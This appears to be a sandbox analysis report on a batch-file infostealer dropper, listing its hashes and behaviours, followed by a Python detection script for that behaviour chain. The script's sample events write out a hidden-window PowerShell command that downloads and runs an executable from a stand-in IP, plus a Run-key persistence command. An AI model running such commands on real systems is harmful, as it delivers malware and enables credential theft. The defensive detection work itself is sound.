General

  • Target

    frdddd.bat

  • Size

    255B

  • Sample

    240726-wde6lathkk

  • MD5

    7cfc0e137d5d8b7f808add077083360b

  • SHA1

    af7b34d385fdfcb6c1e0b37ce3908dcc437f3da9

  • SHA256

    596217a3228f37bd8ac0ea92db6fc1b9fab378b96aea86ecd72e822809d948c5

  • SHA512

    9b02fec89d4dfe4982a824c6b2f3c345c670285718e04c81d0e39e463e9d8f366fff04d892aea6464ef6a644c791aa86429c67e1411bfba6935385f047098ae0

Targets

    • Target

      frdddd.bat

    • Credentials from Password Stores: Credentials from Web Browsers

      Malicious access to, or copying of, a web browser credential store.

    • Blocklisted process makes network request

    • Command and Scripting Interpreter: PowerShell

      Runs PowerShell with its display window hidden.

    • Command and Scripting Interpreter: PowerShell

      PowerShell Invoke-WebRequest (download over HTTP/HTTPS from the script).

    • Downloads MZ/PE file

    • Executes dropped EXE

    • Reads user/profile data of web browsers

      Infostealers commonly target stored browser data, which can include saved credentials and other sensitive profile data.

    • Adds Run key to start application

    • Checks installed software on the system

      Looks up entries under the registry Uninstall key (HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall) to enumerate the software installed on the system.

    • Looks up external IP address via web service

      Uses a legitimate IP lookup service to find the infected system's external IP.

    • Enumerates processes with tasklist
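The signatures above describe a short behaviour chain: a batch file launches PowerShell with a hidden window, PowerShell fetches a PE with Invoke-WebRequest and executes it, and the dropped executable then adds a Run key, enumerates installed software and running processes, and asks a public IP-echo service for the host's external address. The following Python block is an added example, not tria.ge's signature engine or any code from the sample, showing how the same behaviours can be matched in process-creation telemetry. The events, rule names, threshold and IP-lookup host list are all constructed for this example.

```python
import re

# Constructed process-creation events in the shape of Sysmon Event ID 1
# (parent image, image, command line). They are hypothetical lines written
# for this example, not telemetry taken from the tria.ge report.
SAMPLE_EVENTS = [
    ("cmd.exe", "powershell.exe",
     'powershell -w hidden -c "iwr http://198.51.100.23/x.exe -OutFile $env:TEMP\\x.exe; & $env:TEMP\\x.exe"'),
    ("x.exe", "reg.exe",
     'reg add "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run" /v Updater /t REG_SZ /d "%TEMP%\\x.exe"'),
    ("x.exe", "reg.exe",
     'reg query "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall" /s'),
    ("x.exe", "cmd.exe", "cmd /c tasklist /v"),
    ("x.exe", "curl.exe", "curl -s https://api.ipify.org"),
    # Benign admin activity that the rules must not flag.
    ("explorer.exe", "powershell.exe", 'powershell -NoProfile -c "Get-Process | Out-Null"'),
]

# Public IP-echo services commonly used for the "external IP" check.
# Partial, hand-picked list for this example; extend as needed.
IP_LOOKUP_HOSTS = r"(?:api\.ipify\.org|icanhazip\.com|ifconfig\.me|ip-api\.com|checkip\.amazonaws\.com)"

# (rule name, required image or None, case-insensitive regex over the command line)
RULES = [
    # powershell.exe accepts unique prefixes of -WindowStyle, so "-w hidden" works.
    ("powershell_hidden_window", "powershell.exe", r"-w\w*\s+hidden"),
    ("powershell_web_request", "powershell.exe",
     r"\b(?:invoke-webrequest|iwr|invoke-restmethod|irm|downloadfile|downloadstring)\b"),
    ("run_key_persistence", None, r"\breg(?:\.exe)?\s+add\b.*currentversion\\run\b"),
    ("uninstall_key_enumeration", None, r"\breg(?:\.exe)?\s+query\b.*currentversion\\uninstall\b"),
    ("tasklist_enumeration", None, r"\btasklist\b"),
    ("external_ip_lookup", None, IP_LOOKUP_HOSTS),
]
COMPILED = [(name, image, re.compile(pattern, re.IGNORECASE)) for name, image, pattern in RULES]


def match_event(parent, image, cmdline):
    """Return the names of every rule that fires for one event."""
    hits = []
    for name, want_image, rx in COMPILED:
        if want_image is not None and image.lower() != want_image:
            continue
        if rx.search(cmdline):
            hits.append(name)
    # A script host spawning PowerShell is the chain a .bat dropper produces.
    if parent.lower() in ("cmd.exe", "wscript.exe", "cscript.exe") and image.lower() == "powershell.exe":
        hits.append("script_host_spawns_powershell")
    return hits


def scan(events):
    """Map each triggered rule name to the indexes of the events that triggered it."""
    findings = {}
    for idx, (parent, image, cmdline) in enumerate(events):
        for name in match_event(parent, image, cmdline):
            findings.setdefault(name, []).append(idx)
    return findings


def verdict(findings, threshold=3):
    """Crude scoring: count distinct behaviours and compare against a threshold."""
    return "suspicious" if len(findings) >= threshold else "benign"


if __name__ == "__main__":
    found = scan(SAMPLE_EVENTS)
    for name, idxs in sorted(found.items()):
        print(f"{name:32s} events {idxs}")
    print("verdict:", verdict(found))
```

Each rule on its own is noisy (administrators run tasklist and reg query too), which is why the verdict is taken over the number of distinct behaviours seen for one process tree rather than over any single hit; in production the grouping key would be the process GUID chain rather than a flat list index.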

MITRE ATT&CK Enterprise v15